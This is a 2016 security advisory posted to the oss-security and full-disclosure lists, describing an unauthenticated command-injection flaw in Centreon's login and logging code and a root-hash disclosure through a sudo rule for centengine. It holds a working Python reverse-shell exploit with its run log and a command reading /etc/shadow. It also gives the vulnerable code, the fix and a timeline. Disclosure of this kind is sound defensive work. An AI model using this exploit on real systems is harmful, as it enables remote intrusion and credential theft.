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Date: Thu, 25 Feb 2016 11:08:39 +0100
From: Sysdream Labs <labs@...dream.com>
To: oss-security@...ts.openwall.com
Cc: fulldisclosure@...lists.org
Subject: [FD] CVE ID Request : Centreon remote code execution

Unauthenticated Remote Command Execution in Centreon Web Interface
==================================================================


Description
===========

Centreon is a popular monitoring solution.

A critical vulnerability has been found in the Centreon logging class
allowing remote users to execute arbitrary commands.


SQL injection leading to RCE
============================

Centreon logs SQL database errors in a log file using the "echo" system
command and the exec() PHP function. On the authentification class,
Centreon use htmlentities with the ENT_QUOTES options to filter SQL
entities.
However, Centreon doesn't filter the SQL escape character "\" and it is
possible to generate an SQL Error.
Because of the use of the "echo" system command with the PHP exec()
function, and because of the lack of sanitization, it is possible to
inject arbitrary system commands.

**Access Vector**: remote

**Security Risk**: high

**Vulnerability**: CWE-78

----------------
Proof of Concept
----------------

TCP Reverse Shell using python.

    #!/usr/bin/env python
    import requests
    import argparse

    def shell(target, reverseip, reverseport):
        payload = 'import socket as a,subprocess as b,os as
c;s=a.socket(2,1);s.connect(("%s",%d));d=s.fileno();c.dup2(d,0);c.dup2(d,1);c.dup2(d,2);p=b.call(["sh"]);'
% (reverseip,reverseport)
        print "[~] Starting reverseshell : %s - port : %d" % (reverseip,
reverseport)
        req = requests.post(target, data={"useralias": "$(echo %s |
base64 -d | python)\\" % payload.encode("base64").replace("\n",""),
"password": "foo"})
        print "[+] DEAD !"

    if __name__ == "__main__":
        print "[~] Centreon Unauthentificated RCE - Nicolas Chatelain
<n.chatelain@...dream.com>"
        parser = argparse.ArgumentParser()
        parser.add_argument("--target", required=True)
        parser.add_argument("--reverseip", required=True)
        parser.add_argument("--reverseport", required=True, type=int)
        args = parser.parse_args()
        shell(args.target, args.reverseip, args.reverseport)

Shell :

    nightlydev@...rkstation ~/Lab/Centreon $ python reverseshell.py
--target=http://172.16.138.137/centreon/index.php
--reverseip=172.16.138.1 --reverseport 8888
    [~] Centreon Unauthentificated RCE - Nicolas Chatelain
<n.chatelain@...dream.com>
    [~] Starting reverseshell : 172.16.138.1 - port : 8888

# Other term

nightlydev@...rkstation ~/Lab/Centreon $ nc -lvp 8888
Ncat: Version 6.45 ( http://nmap.org/ncat )
Ncat: Listening on :::8888
Ncat: Listening on 0.0.0.0:8888
Ncat: Connection from 172.16.138.135.
Ncat: Connection from 172.16.138.135:50050.
whoami
apache
groups
apache centreon-engine centreon-broker centreon nagios


---------------
Vulnerable code
---------------

The vulnerable code is located in class/centreonLog.class.php, line 82
and line 154:


		/*
		 * print Error in log file.
		 */
		exec("echo \"".$string."\" >> ".$this->errorType[$id]);

In class/centreonAuth.class.php, line 227:

	 $DBRESULT = $this->pearDB->query("SELECT * FROM `contact` WHERE
`contact_alias` = '" . htmlentities($username, ENT_QUOTES, "UTF-8") . "'
AND `contact_activate` = '1' AND 		 `contact_register` = '1' LIMIT 1");


--------
Solution
--------

Update to the Centreon 2.5.4


Possible root password disclosure in centengine (Centreon Entreprise Server)
============================================================================

In some configurations, when centengine can run as root (with sudo).
It's possible to read some file content.

**Access Vector**: local

**Security Risk**: high

**Vulnerability**: CWE-209

----------------
Proof of Concept
----------------

    $ sudo /usr/sbin/centengine -v /etc/shadow
    [1416391088] reading main config file
    [1416391088] error while processing a config file: [/etc/shadow:1]
bad variable name:
'root:$6$3mvvEHQM3p3afuh4$DZ377daOy.8bn42t7ur82/Geplvsj90J7cs1xsgAbRZ0JDZ8KdB5CcQ0ucF5dwKpnBYLon1XBqjJPqpm6Zr5R0:16392:0:99999:7:::'
    [1416391088]

---------------
Vulnerable code
---------------

In Centreon Entreprise Server (CES) : /etc/sudoers.d/centreon

CENTREON   ALL = NOPASSWD: /usr/sbin/centengine -v *

--------
Solution
--------

Do not allow centengine to be run as root or do not disclose the line
that caused the error.

Timeline (dd/mm/yyyy)
=====================

* 18/11/2014 : Initial discovery
* 26/11/2014 : Contact with Centreon team
* 27/11/2014 : Centreon correct vulnerabilities
* 27/11/2014 : Centreon release version 2.5.4 that fixes vulnerabilities

Fixes
=====

*
https://github.com/centreon/centreon/commit/a6dd914418dd185a698050349e05f10438fde2a9
*
https://github.com/centreon/centreon/commit/d00f3e015d6cf64e45822629b00068116e90ae4d
*
https://github.com/centreon/centreon/commit/015e875482d7ff6016edcca27bffe765c2bd77c1

Affected versions
=================

* Centreon <= 2.5.3


Credits
=======

* Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)


Best regards,
-- 
SYSDREAM Labs <labs@...dream.com>

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* Website: https://sysdream.com/
* Twitter: @sysdream



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